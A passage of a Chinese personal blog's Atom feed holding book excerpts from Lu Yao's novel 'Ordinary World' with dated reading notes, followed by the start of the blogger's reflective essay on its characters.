&lt;li&gt;&lt;p&gt;这一切都不能改变精神世界中的空虚和寂寞。在按着固定节奏流逝的时光之中，既缺乏动人心魄的事件，也缺乏龄人企羡的奇遇，这种冷</summary>
      
    
    
    
    <category term="书籍阅读" scheme="https://laobameishijia.github.io/category/%E4%B9%A6%E7%B1%8D%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="书摘" scheme="https://laobameishijia.github.io/tag/%E4%B9%A6%E6%91%98/"/>
    
  </entry>
  
  <entry>
    <title>平凡的世界读后感</title>
    <link href="https://laobameishijia.github.io/2025/04/01/ping-fan-de-shi-jie-shu-zhai/"/>
    <id>https://laobameishijia.github.io/2025/04/01/ping-fan-de-shi-jie-shu-zhai/</id>
    <published>2025-04-01T19:28:00.000Z</published>
    <updated>2025-04-30T08:50:54.041Z</updated>
    
    <content type="html"><![CDATA[<h1 id="平凡的世界书摘"><a href="#平凡的世界书摘" class="headerlink" title="平凡的世界书摘"></a>平凡的世界书摘</h1><h2 id="精简版"><a href="#精简版" class="headerlink" title="精简版"></a>精简版</h2><ol><li><p>正是因为贫穷，因为吃不起好饭，因为年轻而敏感的自尊心。</p></li><li><p>透过城市生活的镜面，他似乎更清楚地看见了他已经生活过十几年的村庄–在那个他所熟悉的古老的世界里，原来有许多有意义的东西，现在看起来似乎有点平淡无奇了，而那里许多本来重要的事物过去他并没有留心，现在倒突然如此鲜活地来到了他的心间。</p></li><li><p>是的，生活就是这样，在我们都是小孩子的时候，一个人和一个人可能有家庭条件的区别，但孩子们本身的差别并不明显，可一旦长大了，每个人的生活道路会有多大的差别呀，有的甚至是天壤之别。</p></li><li><p>人活着，这种亲人之间的感情是多么重要，即使人的一生充满了坎坷和艰辛，只要有这种感情存在，也会感到一种温暖的慰藉。</p></li><li><p>她爷当年就死了，但她爷的地主帽子并没有埋进他的坟墓，而是作为主要遗产留给了父亲和她</p></li><li><p>他现在认识到，他是一个普普通通的人，应该按照普通人的条件正正常常地生活，而不要做太多非分之想。</p></li><li><p>生活已经在他面前展现出更为广阔的内容</p></li><li><p>他渐渐抛弃了这种虚荣或者说自卑，大大方方地站在队列中取他的饭。</p></li><li><p>可这位农村姑娘只要男方给她扯一身，还不要好布料，并且首先要给男方扯好衣服哩，太稀罕了，这大概只有戏里才有这样的先进人物吧。</p><hr><p>16章  2025.03.06 早 11:26</p></li><li><p>他的另外一个成熟的标志，就是对大人的行为开始具备批判的眼心。</p></li><li><p>此刻，田润叶没有心思从根本上检讨她的不幸，她只是悲叹自己的命运不好。</p></li><li><p>归根到底，他们只能这样，人只能按照自己的条件寻找终身伴侣，就好像庄稼一样，只能把豆角和玉米种在一块，而不能和小麦种在一起。</p></li><li><p>在这里谈不到诗情画意，也不允许有想象的翅膀，一个人连肚子也填不饱，怎么可能去想别的事情呢!</p></li><li><p>在一个人的思想还没有强大到自己能完全把握自己的时候，就需要在精神上依托另一个比自己更强的人。</p><hr><p>第二部 1章 2025.03.09 晚20:07</p></li><li><p>这样的城市是一个各色人等混杂的天地，而每一个层次的人又有自己的天地。</p></li><li><p>说句心里话，爸爸这辈子不再图享福，只图一口顺气，现在，爸爸就是睡到黄土里，心也平了。</p></li><li><p>一切都很明确，这个家不管是分还是不分，再也不会像往常一样和谐了。生活带来了繁荣，同时也把原有的秩序打破了。</p></li><li><p>通过不断地读书，少平认识到，只有一个人对世界了解得更广大，对人生看得更深刻，那么他才有可能对自己所处的艰难和困苦有更高意义的理解，甚至也会心平气静地对待欢乐和幸福。</p></li><li><p>和侯玉英这次以外的邂逅，使孙少平感慨万端。唉，时过境迁，他们这一茬人已经开始各自寻找自己的归宿。同学之中，有的已经结婚并且有了儿女，安安稳稳过起了光景日子，少年，少年，那时永远的逝去了……</p></li><li><p>她似乎认定，孙少平最终不会逃脱大多数农村学生的命运。</p></li><li><p>后来她才渐渐认识到，实际生活是冷酷的，因为种种原因，这些不能进入大学门，又进入不了公家门的农村青年，即使性格非凡，天赋很高，到头来仍然会被环境所征服，当然，不是说农村就一定干不出什么名堂，主要是精神境界很有可能被小农意识的汪洋大海所淹没…..</p></li><li><p>是的，他在我们的时代属于这样的青年：有文化，但没有幸运地进入大学或参加工作，因此似乎没有充分的条件直接参与到目前社会发展的主潮之中。另一方面，他们又不甘心把自己局限在狭小的生活天地里。因此他们往往带着一种悲壮的激情，在一条最为艰难的道路上进行人生的搏斗，他们顾不得高谈阔论或愤世嫉俗地忧患人类的命运。他们首先得改变自己的生存条件，同时也不放弃最主要的精神追求，他们既不鄙视普通人的世俗生活，但又竭力使自己对生活的认知到达更深的层次。</p></li><li><p>她兴奋的使，孙少平为她的生活环境树立了一个对应物，或者说给她的世界形成了一个奇特的种子。</p></li><li><p>是的，她和他尽管社会地位和生活处境不同，但人格上是平等的。这种关系只有在共同探讨的基础上才能形成，或许他们各自都有需要对方改造的地方，改造别人也就是对自己本身的改造。</p></li><li><p>她喜欢孙少平的正是他不伪装自己，并不因生活的窘迫就感到自己活得没有意义，她看得出来，少平甚至对苦难有一种骄傲感，只有更深邃地理解了生活的人才会在精神上如此强大。</p></li><li><p>当然，他们如此挣命，是因为生活突然充满了巨大的希望，有了希望，人就会产生激情，并且可以义无反顾地为之付出代价，在这样的过程中，才能真正体会到人生的意义。人生就是永不休止的奋斗，只有选定了目标并在奋斗中感到自己的努力没有虚掷，这样的生活才是充实的，精神也会永远年轻。</p><hr><p>2025.03.10 下午15：27 第二部第十五章</p></li><li><p>这是人生的心酸，在我们短促而又漫长的一生中，我们苦苦地寻找人生的幸福。可幸福往往又与我们失之交臂，当我们为此耗尽宝贵的青春年华，皱纹也悄悄地爬上了眼角的时候，我们或许才能稍稍懂得生活实际上意味着什么</p></li><li><p>命运往往就是如此，有的人事事不顺，有的人一顺百顺。</p><hr><p>2025.03.10 晚7:37 </p></li><li><p>他不由再一次思考，我们活在人世间，最为珍视的应该是什么？金钱？权力？荣誉？是的，有这些东西并不坏，但是没有什么东西能比得上温暖的人情更为珍贵—你感受到的生活的美好，莫过于这一点。</p></li><li><p>只有劳动才可能使人在生活中强大，不论是什么人，最终还是要崇尚那些能用双手创造生活的劳动者。</p></li><li><p>唉，归根结底，他和晓霞的最终关系也许要用悲剧的形式结尾，这悲观性的结论实际上一直深埋在他的心灵深处。</p><hr><p>2025.03.11 晚21:52</p></li><li><p>人处在一种默默奋斗的状态，精神就会从琐碎中得到升华。</p></li><li><p>对于一个平凡的农民来说，要在大时代的变革浪潮中奋然跃起，那是极其不容易的，而跌落下来又常常就在朝夕之间。像孙少安这样一些后来被光荣地奉为“农民企业家”的人。在他们事业的初创阶段是非常脆弱的，一个偶然的因素，就可能使他们处于垮台的境地。而那种是他们破产的偶然性，却是惯常的现象。因为中国和他们个人都是在一条铺满荆棘的新路上摸索前行，碰个鼻青脸肿几乎不可避免。</p></li><li><p>你有没有决心为他而付出自己最大的牺牲，这是衡量是不是真正爱情的标准，否则就是被自己的感情所欺骗。</p></li><li><p>在这个世界上，在人的生活里，常常会有这样的巧合，这不是艺术故事，而是活生生的人的遭遇。</p><hr><p>2025.03.13 晚11:29</p></li><li><p>多少美好的东西消失和毁灭了，世界还像什么事情也没有发生一样。是的，生活在继续着，可是生活中的每一个人却在不断地失去自己最珍贵的东西。生活永远是美好的，人的痛苦却时时发生。</p></li><li><p>不同生活处境的人应该寻找各自的归宿。</p><hr><p>2025.03.14 晚8:24</p></li></ol><h2 id="完整版"><a href="#完整版" class="headerlink" title="完整版"></a>完整版</h2><ol><li><p>他慢慢懂得，人活着，就得随时准备经受磨难。他已经看过一些书，知道不论是普通人还是了不起的人，都要在自己的一生中经受许多的磨难。</p></li><li><p>这就是他生命的全部意义，这就是他活着的全部价值。</p></li><li><p>他佝偻着高大的身躯，失神地望着东拉河对面黑乎乎的庙坪山。山依然像他年轻时一样，没高一尺，也没低一尺，可他老了，也不能了。</p></li><li><p>是啊，这是命运。正如辛劳一年营务的庄稼，还没等收获，就被冰雹打光了，难道能懊悔自己曾经付出的力气吗？</p></li><li><p>只有在这社会的大风大浪中，他才把饿肚子放在一边，精神上享受着一种无限的快活。</p></li><li><p>不，他哥终究是他哥！别说他说了这么些话，就是再反动一点，他也不会出卖他的。哼，革命是革命，亲人是亲人。</p><hr><p>2025.03.15 晚8:02 第一部第九章</p></li><li><p>对他来说，站在这里和站在别的地方有什么区别呢？</p></li><li><p>但他们仍然像以前一样，在一块亲密地厮混着玩耍，在他六岁那年，有一天，父亲给他楔起一把小镢头，又给了他一根小绳，说：少安，你也大了，应该出去干点活了。跟着爸爸砍柴去吧！</p></li><li><p>他已经十三岁了，不用父亲说，自己也知道不能去城里读书了。</p></li><li><p>别了，我童年的朋友！我们将各走各的路了，我会永远记得我们过去的一切，他从此便心平气和地开始了自己的农民生涯，并且决心要在双水村做一个出众的庄稼人。</p></li><li><p>人民，只有人民，才是创造世界历史的动力。</p><hr><p>2025.03.16 早11：00 第一部， 第十三章</p></li><li><p>田润叶在婚姻上的坎坷有两个根本原因，一是长期在二爸家居住，在经济和生活上存在依附关系，导致其无法完全按照自己的意愿行事。二是，她在工作上与孙少安不对等，一个是公职人员，一个是农民。</p></li><li><p>半路上，兰花心疼地对男人说：家里还有六颗鸡蛋，我回去就煮，你和猫蛋狗蛋一人两个！（这是在王满银被劳教之后，兰花的话，女人的爱真伟大，此时她甚至没有考虑到自己）</p><hr><p>2025.03.16 晚20:49 第一部，第十六章</p></li><li><p>少安现在感到欣慰的是，他对润叶的求爱采取了完全正确的态度。田福堂现在又用铁的逻辑进一步给他论证了这件事的不可能性。</p></li><li><p>他顿时感到他刚才的情绪充满了危险，是的！一家老老少少都依靠和指望着他，他怎么能这样胡思乱想呢？不，他应该像往常一样，精神抖擞地跳上这辆生活的马车，坐在驾辕的位置上，绷紧全身的肌肉和神经，吆喝着、呐喊着、继续向前走去。如果他垮了，说不定人仰马翻，一切都完了（或许，当年舅舅也是这样想的）</p></li><li><p>孙玉厚半天才咄讷地说：我就在你后头走着….我让兰香先回去了，我怕你万一想不开。少安鼻子一酸，竟冲动地趴在高粱地里出声地哭了，在这一刻，在父亲面前，他才又一次感到自己是个孩子。</p></li><li><p>只要彩礼少，我不挑拣人。（少安对于婚姻的感悟远不及他对生活的感悟，生活的重担早已让他无法完全为自己考虑婚姻的问题）</p></li><li><p>一切都毫无办法，对于一个普通人来说，只好听命于生活的裁决，这不是宿命，而是无法超越的客观条件。在这个世界上，不是所有合理的和美好的都能按照自己的愿望存在或实现。</p></li><li><p>他本质上仍是农民的儿子，但他竭力想挣脱和超越他出身的阶层。</p></li><li><p>庄稼人出于本能和习惯，依然在这些毫无收获指望的土地上辛勤劳作着，抚哺这些快要死亡的，用他们的血汗浇灌起来的生命。整个村子已经失去了生气，任何人的脸上都再看不出一丝笑容来了。到处都能听到庄稼人的叹息，听见他们忧愁地谈论今冬和明年的生计。</p><hr><p>2025.03.17 晚7:38 第一部 第二十六章</p></li><li><p>有文化的城里人往往不能想象农村姑娘的爱情生活，在他们看来，也许没有文化就等于没有头脑；没有头脑就等于不懂得多少感情。可是实际也许和这种偏见恰恰相反。真的，正是由于她们知识不多，精神不会太分散，对两性之间的感情非常专注。所以这种感情实际上，更丰富，更强烈。</p></li><li><p>这就是我们中国的劳动人民，他们曾经修建起雄伟的万里长城，凿通横贯南北的大运河……今天他们饿着肚子，又气壮如虹地宣称，他们要把地球戳个大窟窿。</p></li><li><p>在返回公社的路上，几个领导人谁也没说话，大家的心情都很沉重，他们从群众的情绪里，再一次强烈地意识到，农民目前对我们的许多政策是多么的不满意啊–岂止是不满意。</p><hr><p>2025年3月20日 晚8:46 第一部第三十三章</p></li><li><p>少安垂着头离开这小桥，迈着沉重的脚步向家里走去，不知为什么，他感到自己眼窝里热辣辣的。他也没什么可惋惜的，因为命运就该如此。</p></li><li><p>大自然不管人世间的喜怒哀乐，总是按他自己的规律循序渐进地变换着一年的四季。</p></li><li><p>但普通人和出类拔萃的人一样，也有自己的欢乐和痛苦，只不过不为大多数人了解罢了。人们宁愿去关心一个蹩脚的电影演员的吃喝拉撒和鸡毛蒜皮，而不愿意了解一个普通人波涛汹涌的内心世界…</p></li><li><p>她开始动摇了，她的力量使她无法支撑如此巨大的精神压力。当然除过客观的压力外，她主观上的素养本来也不够深厚。是的，她现在还不能以更高意义上来理解自身和社会。尽管她是一个正直善良的人，懂事，甚至也有比较鲜明的个性，但并不具有深刻的思想和广阔的眼界，因此最终她还是不能掌握自己的命运。</p></li><li><p>从古至今，人世间有过多少这样的阴差阳错！这类生活悲剧的演出，不能简单地归结为一个人的命运，而常常是当时社会的各种矛盾所造成的。</p><hr><p>2025.03.21 晚8:58  第一部 第四十五章</p></li><li><p>世事啊，把人逼到了这样一种地步！归根到底，他们都是普普通通的老百姓，怎么可能和社会的大潮流对抗呢？</p></li><li><p>在农村，从古代到现代，似乎有一条不成文的法规：此类“桃色事件”可以不经过官方，由户族与户族之间解决，这就意味着暴力与战争。在历史上，这种时间往往酿成了惨痛的流血和屠杀。户族、种族之间的冲突，也许是人类最大的悲剧，这种战争往往是由一些鸡毛蒜皮引起的，而且根本分不清谁是谁非，结局就是让很多人毫无意义地倒在了血泊之中。</p></li><li><p>这窑洞，这院子，每一个角落，每一块石头和土疙瘩，都是他们生活的一个有机部分。失掉这些东西，多少日子他们都会感到心中空落落的。对一个普通农民来说，家庭院落就是自己一生中最重要的世界，和如此依恋的天地告别，那痛苦是外人所不能全部理解的。</p></li><li><p>宽容的读者，你们仔细想想，对于这老太太来说，世界上还有什么地方比得上她丈夫留下的这块地值得她留恋？她住在这窑洞里，就会温暖地回忆起已故的先生，回忆起当年她和丈夫在这里度过的那些美妙时光。如果离开这些回忆，让她怎么再活下去？</p></li><li><p>生活就是如此无情，她使一个劳动者连最起码的尊严都不能保持！</p><hr><p>2025.03.22 周六 下午3:00 第一部完结</p></li><li><p>新和旧，古老和现代，一切都混同并存、交错参杂。</p></li><li><p>可是，世界上谁能没有这种情感呢？只是因为繁重的工作和艰难的事业，人才常常把个人的情感掩埋在心灵的深处，而并不是这种东西就丧失掉了，不，这种掩埋起来的个人情感往往更为深沉，更为巨大。</p></li><li><p>社会在变化，生活在变化，人也在变化，没有什么是一成不变的，包括人的关系。</p></li><li><p>田福军听这话，内心忍不住感慨万端。他想不到自己当了这么个“官”，在多少人中间引起了那么多的看法、想法……这叫人感到无谓的烦恼啊！中国人把多少心思和精力都投入到了这种可怕的损耗之中。</p><hr><p>2025.03.23 周日 下午2:56 第二部 第八章</p><hr><p>2025.03.25 下午5:22 第二部第十三章</p></li><li><p>田福堂从双水村眼前社会生活的大镜子中，看到了自己的渺小。</p></li><li><p>爬到半坡上时，少平感觉自己太过分了。他所具有的文化素养使他意识到他的行为是野蛮的。一刹那间，对别人的不满意和对自己的不满意使他忍不住两眼噙满了泪水。</p></li><li><p>一旦长大成人，开始独立生活。我们便很快知道，亲戚关系常常是庸俗的；互相设法沾光，沾不上光就翻白眼，甚至你生活中最大的困难也是亲戚们造成的。生活同样会告诉你，亲戚往往不如朋友对你真诚，见鬼吧，亲戚。（这一段是在描述少平去黄原投奔的远方舅舅，这个关系很远了，要在具体环境中分析这句话）</p></li><li><p>在双水村人的想象中，金俊海不知道在黄原享什么福。但出门人很快就知道，在这个城市里，金俊海就是个“穷人”。</p></li><li><p>记得那时间，大家都信誓旦旦地表示，他们全班同学有一天还会重新相聚，现在看来，那纯粹是一种少年之梦。一旦独立地投入严峻的生活，中学生的狼们情调很快就烟消云散了。</p></li><li><p>一切都很明确，这个家不管是分还是不分，再也不会像往常一样和谐了。生活带来了繁荣，同时也把原有的秩序打破了。</p></li><li><p>通过不断地读书，少平认识到，只有一个人对世界了解得更广大，对人生看得更深刻，那么他才有可能对自己所处的艰难和困苦有更高意义的理解；甚至也会心平气静地对待欢乐和幸福。</p><hr><p>2025.03.26 晚9:00 第二部第二十一章</p></li><li><p>什么是社会主义？社会主义不是一个美丽而空洞的口号，也不是意味着贫穷面前人人平等，要穷大家一样穷。社会主义首先应该极大地发展生产力，以此证明自己比别的制度优越，否则就无力对历史做出回答。</p></li><li><p>田福军同时想到，许多人由于过去的理想和信仰一次次被现实所粉碎，在眼下新的社会条件下，他们便也变得“现实”起来，而这种人所谓的“现实眼光”，不过是衰老心灵的一孔之见罢了。</p></li><li><p>白元就是这样理解大官的。生活中有那么一种人，你蔑视甚至侮辱他，他不仅视为正常，还对你挺佩服；你要是在人格上与他平等相待，他反倒小看你。</p><hr><p>2025.03.28 晚 8：30 第二部第二十七章</p></li><li><p>时光静悄悄地在流逝。世界上有些人因为忙而感到生活的沉重，也有人因为闲而活得压抑。人啊，都有一本难念的经，可是不同处境的人又很难理解别人的苦处。</p></li><li><p>徐国强老汉突然感到这个世界空落落的，许多昨天还记忆犹新的事情，好像一下子变得遥远了。这个时候，他并不感到生命短促，反而觉得他活得太长久。</p></li><li><p>人的感情有时候真是不可思议，他也许对人是冷漠的，但可以对一个动物怀着永远的眷恋。</p></li><li><p>他真惊叹过去那些不识字的农民，编出这样美妙而深情的歌，这不是歌，是劳动者苦难而深沉的叹息。</p></li><li><p>可是对于大多数人来说，生活的变化是缓慢的。今天和昨天似乎没有什么不同；明天也可能和今天一样，也许人一生中仅仅有那么一两个辉煌的瞬间—甚至一生都可能在平淡无奇中度过。</p></li><li><p>在城市，没有正式工作，就意味着什么也没有。虽然现在的姑娘们开化了，但婚姻问题上，这个最基本的条件很少有人采取无所谓的态度。在中国目前的社会里，很多情况下，感情往往并不是男女结合的主要因素，而常常要受其他因素的制约和支配。</p></li><li><p>生活不能等待别人来安排，要自己去争取和奋斗；而不论其结果是喜是悲。你总不枉在这世界上活了一场人。有了这样的认识，你就会珍惜生活，而不会玩世不恭；同时也会给自身注入一种强大的内在力量….</p></li><li><p>不过，日常生活的纷繁不会让人专注地沉湎于自己的不幸，即使人的心灵伤痕累累，也还得要去为现实的生存和发展而挣扎。</p></li><li><p>如果我们自己有过一些生活的阅历和感情的经历，我们就会深切地可怜他们、同情他们，并且也能理解他们这种疯狂而绝望的痛苦….</p></li><li><p>痛苦啊，往往是人走向成熟的最好的课程。</p></li><li><p>一切都说不清楚….,对于有些人来说，寻找幸福是一件不容易的事情，摆脱苦难同样也不容易。</p></li><li><p>在没有其他理由可以解释。向前这样做，是要感动她。但这恰恰引起了她对他更为深刻的反感。一个女人如果不喜欢一个男人，那这个男人就左也不是右也不是—我们可怜的向前所处的就是这样一种境况。</p><hr><p>2025.03.29 晚8:09 第二部第三十八章</p></li><li><p>什么是人生？人生就是永不休止的奋斗，只有选定了目标并在奋斗中感到自己的努力没有虚掷，这样的生活才是充实的，精神也会永远年轻。</p></li><li><p>阐述这个变化的深远历史意义也许并不是小说家所能胜任的，我们只是在描述这个历史大背景下人们的生活时，不由得感叹，我们这一代人经历了如此深刻而又富于戏剧性的历程！现在还是孩子的人们，将不会全部理解我们这代人对生活的那种复杂体验。</p></li><li><p>中外历史证明，革命常常容易在最贫困落后的地区开始。而较富庶的地方，变革往往要更困难一些。</p></li><li><p>领导这么大一个省，省委书记不可能在一切事情上明察秋毫，再说，即使看出类似的问题，有时也不得不作某种妥协—这是政治生活中常有的现象。</p><hr><p>2025.03.30 晚8:14 第二部</p></li><li><p>大学，这是人生的一个分水岭，当你一踏进它的校门，便会豁然明白。你已经从孩子变成了大人，青春岁月开始了，这是你的黄金年华，连空气都像美酒一般醇香醉人。</p></li><li><p>无论是个人还是社会，许多意义深远的重大事件，往往是从某些微不足道的小事开始的。</p></li><li><p>对于天才来说，能在一个小范围内找到知音，那概率如同大海捞针。</p></li><li><p>不要以为一个人一时正确，就认为他永远正确。也不要因为一个人犯过错误，就断定他永远不可能再加入优秀者的队伍，道理是如此简单，事实又在不断佐证，可是生活中用不变的眼光看待人的现象却是常常存在。</p></li><li><p>当一个人集中地凝视自己的不幸时，他就很难想象别人的苦难。</p></li><li><p><strong>他永远是这样一种人：既不懈地追求生活，又不敢奢望生活过多的报酬和宠爱，理智而清醒地面对着现实。这也许是所有从农村走出来的知识阶层所共有的一种心态。</strong></p></li><li><p>我们承认伟人在历史进程中的贡献。可人类生活的大厦从本质上说，是由无数普通人的血汗乃至生命所建造的。伟人们常常企图用纪念碑或纪念堂来使自己永世流芳。真正万古长青的却是普通人的无名纪念碑—-生生不息的人类生活自身。是的，生活之树常青。</p></li><li><p>他知道，人的痛苦只能在生活和劳动中慢慢消磨掉。</p><hr><p>2025.03.31 下午5:39 第三步第十九章</p></li><li><p>幸福，或者说生存的价值，并不在于我们从事什么样的工作。在无数艰难困苦之中，又何尝不包含人生的幸福啊</p></li><li><p>任何时候，处在失败者的位置上，就得忍辱受屈。</p></li><li><p>大时代的浪潮不仅改变物质世界，更重要的是，也在改变人。</p></li><li><p>是的，世界上怕就怕“认真”二字，他太认真了！<strong>人和社会，一切斗争的总结局也许都是中庸而已，与其认真，不如随便。</strong></p></li><li><p>人生啊，是这样不可预测，没有永恒的痛苦，没有永恒的幸福。生活像流水一般，有时是那么平展，有时又那么曲折。</p></li><li><p>唉，不管怎说，在任何时候，诉苦总是一种软弱的表现，尤其一个男人向一个女人诉苦。</p></li><li><p>命运总是不如人愿，但往往是在无数的痛苦中，在重重的矛盾和艰难中，才使人成熟起来，坚强起来；虽然这些东西在实际感受中带给人的并不都是欢乐。</p></li><li><p><strong>爱情，应该真正建立在现实生活坚实的基础上，否则，它就是在活生生的生活之树上盛开的一朵不结果实的花。</strong></p></li><li><p>有时候，现实生活中某些引起社会强烈震动的突发性事件，往往是历史所发出的回声。</p></li><li><p>他年纪越大，越相信有一种看不见的力量掌握着尘世间每一个人的命运；甚至掌握着大自然的命运。</p></li><li><p>伟大的生命，不论是以何种形式，将会在宇宙间永存。我们这个小星球上的人类，也许将继续繁衍和发展。直到遥远的未来，可是生命对于我们来说又是多么短暂。不论是谁，总有一天，都将会走到自己的终点–死亡，这是伟人和凡人共有的最后归宿。热情的诗人高歌生命的恋歌，而冷静的哲学家却说：死亡是自然法则的胜利……</p></li><li><p>只是我们从中再一次看到，作为一个重要领导干部，由于自己的弱点，会造成什么样的结果。</p></li><li><p>的确，有时候，往往一个极偶然的因素，就可能会改变一个人的生活。王满银得感谢大上海小旅馆里的这面破镜子，它不仅照出了他的嘴脸，他的衰老，而且也照出了他半生荒唐而愚蠢的生活。</p></li><li><p>无论精神多么独立的人，感情却总是在寻找一种依附，寻找一种归宿。</p></li><li><p>青年，青年！无论受到怎样的挫折和打击，都要咬着牙挺住。因为你们完全有机会重建生活，只要不灰心丧气，每一次挫折就只不过是通往新境界的一块普通的绊脚石，而绝不会置人死命。</p></li><li><p>仅就孙少安来说，这件事也暴露出发达起来的农民的一种心态。一方面，普遍的贫困所引起的社会红眼病，使他们像传统的财主一样不愿意“露富”；另一方面，自身长期社会地位地下，又使他们不甘心寂寞无闻，产生了强烈的出人头地的欲望。</p></li><li><p>人类史告诉我们，贫穷会引起一个社会的混乱、崩溃和革命，巨大的财富也会引起形式有别的相同的社会效应。</p></li><li><p>对我们爱说，也许类似的话题谈论的有些为时过早了。不过，有时候我们不得不预先把金钱和财富上升到哲学、社会学和历史学的高度来认识，正如我们用同样的高度来认识我们的贫穷与落后。</p></li><li><p><strong>在我们的生活中，总有一些人的认知超越一般的水平线，这种认识当然出自这些人非同一般的生活经历，而不在于读了多少伟人们的“生活指南书”。</strong></p></li><li><p>生活似乎走了一个令人难以置信的圆。但生活又不会以圆的形式结束。</p><hr><p>2025.03.31 晚21:14 完结</p></li></ol>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;平凡的世界书摘&quot;&gt;&lt;a href=&quot;#平凡的世界书摘&quot; class=&quot;headerlink&quot; title=&quot;平凡的世界书摘&quot;&gt;&lt;/a&gt;平凡的世界书摘&lt;/h1&gt;&lt;h2 id=&quot;精简版&quot;&gt;&lt;a href=&quot;#精简版&quot; class=&quot;headerlink&quot; title=</summary>
      
    
    
    
    <category term="读书" scheme="https://laobameishijia.github.io/category/%E8%AF%BB%E4%B9%A6/"/>
    
    
    <category term="平凡的世界" scheme="https://laobameishijia.github.io/tag/%E5%B9%B3%E5%87%A1%E7%9A%84%E4%B8%96%E7%95%8C/"/>
    
  </entry>
  
  <entry>
    <title>平凡的世界读后感</title>
    <link href="https://laobameishijia.github.io/2025/04/01/ping-fan-de-shi-jie-du-hou-gan/"/>
    <id>https://laobameishijia.github.io/2025/04/01/ping-fan-de-shi-jie-du-hou-gan/</id>
    <published>2025-04-01T13:01:00.000Z</published>
    <updated>2025-04-30T08:50:54.041Z</updated>
    
    <content type="html"><![CDATA[<h1 id="平凡的世界读后感"><a href="#平凡的世界读后感" class="headerlink" title="平凡的世界读后感"></a>平凡的世界读后感</h1><p>其实我昨天就已经读完了。之所以拖到今天，是想着顺便把电视剧给看完。书中讲述的故事和这本书的题目一样，平凡的世界。前些日子我看过精简版的，总感觉少了点什么，于是又把完整版的看了一遍。毫无疑问，完整版对于更多人物心理活动的刻画是更细腻的，带给人的感受也就愈鲜活。故事发生的时代是在七十年代到九十年代，于现实生活对应的话，应该是我爷爷和奶奶那辈的人，但我更多的联想到了我的父辈。</p><p>孙玉厚有两个儿子，两个女儿，大女儿兰花嫁了一个逛鬼王满银。孙少安排行老二，因为社会地位的差距，没能和自己的青梅竹马田润叶结婚，娶了来自山西的贺秀莲。孙少平是老三，在城市里干建筑工，后来当了煤矿工人，爱人田晓霞在洪水中为救孩子牺牲。孙兰香考上了北方工业大学，与副省委书记的儿子谈起了恋爱。他还有一个兄弟，叫孙玉亭，早些年是钢厂的工人，后来回到双水村与贺秀英结婚，夫妇二人都热衷于搞政治运动。两个儿子和田家的姑娘有扯不断的联系，田润叶是田福堂的女儿，他还有一个儿子叫润生，最终和郝红梅结婚。姐弟俩平时都呆在他们二爸家，也就是田福堂的弟弟田福军，早期是县革委会的副主任。少平的爱人晓霞就是他的女儿。他也有一个儿子，叫晓晨。</p><p>故事的主要人物大抵就是这些了，下面来谈谈感悟吧。首先是孙少安的感情和奋斗经历，孙少安十三岁就已经开始支撑起这个家了，虽然没上高中，但他的成绩的确很好，考了全县第三，如果当初和润叶一起上了学，他们大抵也会走到一起吧。可就是因为这个农民身份，不仅田福堂看不上他，他自己也没有信心和润叶走下去。于是他娶了不要彩礼的秀莲。和电视剧不同的是，少安并没有贪恋润叶，反倒理所应当的和秀莲过起了日子。他几乎没有什么抱怨和不甘，和秀莲一起支撑这个家，从集体合作制到开砖窑再到承包砖厂。电视剧里虽然强化了少安对润叶的感情，但最终也用一句话向观众表达了爱首先应该是责任的观点。<strong>过去的感情就像牙齿，掉了就是没了，按上也是假的。</strong> <strong>我佩服少安的敢于面对生活的勇气，他果断放弃了对润叶的感情，不仅为润叶，也为自己的家。</strong>当然命运也奖励了他一份礼物，那就是秀莲，像电视剧的弹幕“百年难遇田润叶，万年难遇贺秀莲”一样，我对秀莲只有敬意，可惜最终原西县医院判定了她的病是肺癌。路遥先生并没有写后续的故事，如同这本书的名字一样，平凡的世界。无论你对一个人的感情再深厚，生老病死都无法躲过，这里有奇迹，但更多的是平凡人对于命运的抗争。当然，在那个医术水平不高的年代，我希望这是一次误诊。</p><p>再说说润叶，润叶婚姻的不幸是各种因素综合到一起的结果，她没有像少安那样果断地接受自己的命运，而是与命运闹了很长一段时间的别扭。结束这场别扭的是李向前的车祸，双腿截肢。这起车祸唤醒了润叶，也彻底断绝了她的后路。在这种情况下，抛弃向前等于彻底否定她的人格。面对这样的悲剧，润叶居然真正地担负起一个妻子的责任，开始照顾向前的生活，后来他们也有了一个儿子。我即心疼润叶，也不理解润叶。如果开始就和向前一起好好过日子，向前不至于喝醉酒发生车祸。但也许命运正是要通过这起悲剧告诉润叶，生活中的幸福往往需要历经苦难的磨砺吧。<strong>可我还是认为润叶本可以避免这起悲剧，就像她曾经可以拒绝和向前结婚一样。</strong></p><p>说到润叶，不得不谈及秀莲，如果说润叶和少安是青梅竹马，那秀莲和少安简直是绝配。体贴、懂事、肯干，秀莲的优点完全符合老孙家对于儿媳妇的要求。我很佩服像秀莲一样的女性，比如我的妈妈。她们满心铺在这个家上，不在乎自己的吃穿，为了家庭可以燃烧掉自己。对于她们而言，快乐的阈值是很低的，喝一瓶汽水、吃个雪糕，甚至无忧无虑地躺上一下午。之前过年去逛那满是垃圾的黄山时，我记得老妈、老爸、奶奶她们脸上满意的笑容，<strong>是的，满地的垃圾并没有跟他们带来任何不适，她们完全适应这个场合，并且带着由衷的笑意。因为她们真得是从艰苦岁月中奋斗过来的，能享受奋斗之水浇灌出来的果实，她们已经很满意了。</strong>对比我呢，享受着各种优厚的条件，却仍不满足。有的时候我也再劝自己，知足常乐，我真的已经很幸福了。</p><p>然后谈谈少平吧，少平是一个典型的书生，阅读过很多小说和文学作品，将理想主义印在了脑门上。我即佩服他敢于吃苦、不怕苦不怕累的作风，但同时也埋怨他的幼稚。换做是我，跟哥哥一起经营砖厂有什么不好，非要跑到黄原，跑到铜城大牙湾煤矿干什么矿工。放着一条平坦的路不走，反倒去淌浑水。实在是不能理解，但生活里的确也不缺乏这种人。跟少平相比，我更更像少安，我们都是现实主义的人，没有那么对所谓的理想，也不追求什么见识。不会因为念了一些书，就不甘于做一些平凡的工作，毕竟人还是要生活的嘛。但少平却遇到的了知音田晓霞，他们都属于理想主义者，甚至可以将诗歌和外国小说的情节带有感情的朗诵出来。<strong>是的，如果少平不是理想主义，他在黄原城打工的时候就会拿曹书记多支付的工资，他不会去救被胡永洲强暴的姑娘小翠更不会把自己的钱给她，他也不会去帮助偷手娟的郝红梅，更不会冒着生命危险救侯玉英。如果晓霞不是理想主义，她也不会在洪水中冒着生命危险救小女孩，不会以记者的身份要求跟着少平一起下矿，不会拒绝高朗的追求。</strong>虽然我不懂少平为什么不和哥